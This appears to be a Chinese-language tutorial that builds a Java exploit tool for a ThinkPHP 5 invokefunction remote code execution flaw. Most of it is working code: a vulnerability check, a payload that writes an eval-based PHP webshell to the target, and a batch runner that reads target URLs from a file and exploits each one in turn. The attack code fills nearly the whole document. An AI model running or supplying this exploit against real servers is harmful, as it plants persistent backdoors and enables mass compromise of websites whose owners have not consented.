目录

1.【CVE-2018-1002015】thinkphp命令执行漏洞

2.编写为标准类

2.1 标准类文件标准

2.2 测试类文件调用

3.批量检测

3.1 读取文本

3.2 标准类

3.2 测试类

---

1.【CVE-2018-1002015】thinkphp命令执行漏洞

        以此漏洞为例,通过编写两个方法,分别是漏洞的POC和EXP,看过之前的笔记的师傅,到这里其实也能很容易理解和使用下面的代码,如果需要检测其他相近的漏洞,只需略改即可.

java">package com.deger.Exp;import com.github.kevinsawicki.http.HttpRequest;public class SpringActuatorExp {public static void main(String[] args) {//        System.out.println(Result("http://127.0.0.1:8080/"));//GetshellGetShell("http://127.0.0.1:8080/");}public static String Result(String url){String palyload = "/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1";if(VulTest(url,palyload)==true){return "存在漏洞\n测语句为:"+url+palyload;}else{return "不存在TP5EXP";}}// 判断是否响应页面是否存在1(是否存在漏洞)public static boolean VulTest(String url, String palyload){String md5str = "c4ca4238a0b923820dcc509a6f75849b";HttpRequest request = HttpRequest.get(url + palyload);if (request.body().contains(md5str)){return true;}else{return false;}}// 漏洞利用exppublic static String GetShell(String url){String palyload = "/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php eval($_REQUEST['m']);echo \\\"ok\";?>";//增加url编码String s = (HttpRequest.get(url + palyload, true)).body();String content = HttpRequest.get(url + "webshell.php?m= echo md5(1);",true).body();if (content.contains("c4ca4238a0b923820dcc509a6f75849b")){return "网站存在漏洞 webshell"+url+ "/webshell.php 的密码是m";}else{return "写入shell失败";}}
}

2.编写为标准类

        显然,前面的方式使用起来还是比较麻烦的,对于不同的网站在进行检测和利用时,需要更改url,和其他的很多信息,并且调用起来也不方便,编写为标准类便省了很多时间.

2.1 标准类文件标准

java">package com.deger.Exp;import com.github.kevinsawicki.http.HttpRequest;public class Tp5Exploit {private String url;private String payload;private final String STR = "c4ca4238a0b923820dcc509a6f75849b";public Tp5Exploit() {}public Tp5Exploit(String url, String payload) {this.url = url;this.payload = payload;}public String getUrl() {return url;}public void setUrl(String url) {this.url = url;}public String getPayload() {return payload;}public void setPayload(String payload) {this.payload = payload;}public void Exploit(){setUrl("http://127.0.0.1:8080/");setPayload("/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php eval($_REQUEST['m']);echo \\\"ok\";?>");int code = HttpRequest.get(getUrl() + getPayload(), true).code();if (code == 200) {String content = HttpRequest.get(getUrl() + "/webshell.php?m=echo md5(1);", true).body();if (content.equals(STR)) {System.out.println("网站存漏洞"+url+"webshell.php 密码是:m");}else{System.out.println("写入shell失败");}}}
}

2.2 测试类文件调用
 

      在使用时,只需要传入url和调用对应的类的方法即可,如果需要其他参数,也可以在基础类的基础上进行编写.

java">package com.deger.Exp;public class TestMain {public static void main(String[] args) {Tp5Exploit tp5Exploit = new Tp5Exploit();tp5Exploit.setUrl("http://127.0.0.1:8080");tp5Exploit.Exploit();}
}

3.批量检测

        如果遇到多个资产需要进行检测的情况下,我们需要进行批量检测,这时候就需要用到批量检测,而原理也是非常简单,就是几个步骤 读取文本里的网址->循环遍历->调用检测方法.

3.1 读取文本

java"> File file = new File("D:\\DaiMaShenJi\\Exploit\\src\\main\\java\\com\\deger\\Exp\\url.txt");InputStreamReader br = new InputStreamReader(new FileInputStream(file), StandardCharsets.UTF_8);BufferedReader reader = new BufferedReader(br);String str;while((str = reader.readLine()) != null) {System.out.println(str);}

3.2 标准类

java">package com.deger.Exp;import com.github.kevinsawicki.http.HttpRequest;public class Tp5Exploit {private String url;private String payload;private final String STR = "c4ca4238a0b923820dcc509a6f75849b";public Tp5Exploit() {}public Tp5Exploit(String url, String payload) {this.url = url;this.payload = payload;}public String getUrl() {return url;}public void setUrl(String url) {this.url = url;}public String getPayload() {return payload;}public void setPayload(String payload) {this.payload = payload;}public void Exploit(){setUrl("http://127.0.0.1:8080/");setPayload("/?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=webshell.php&vars[1][]=<?php eval($_REQUEST['m']);echo \\\"ok\";?>");int code = HttpRequest.get(getUrl() + getPayload(), true).code();if (code == 200) {String content = HttpRequest.get(getUrl() + "/webshell.php?m=echo md5(1);", true).body();if (content.equals(STR)) {System.out.println("网站存漏洞"+url+"webshell.php 密码是:m");}else{System.out.println("写入shell失败");}}}
}

3.2 测试类

在之前代码的基础上,增加了读取文本中的url和循环遍历调用检测方法.

java">package com.deger.Exp;import java.io.*;
import java.nio.charset.StandardCharsets;public class ScaTest {public static void main(String[] args) throws Exception {//使用绝对路径来度取File file = new File("D:\\DaiMaShenJi\\Exploit\\src\\main\\java\\com\\deger\\Exp\\url.txt");InputStreamReader br = new InputStreamReader(new FileInputStream(file), StandardCharsets.UTF_8);BufferedReader reader = new BufferedReader(br);String str;//创建标准类对象Tp5Exploit tp5Exploit = new Tp5Exploit();while((str = reader.readLine()) != null) {//设置urltp5Exploit.setUrl(str);//调用漏洞exptp5Exploit.Exploit();
//            System.out.println(str);}}
}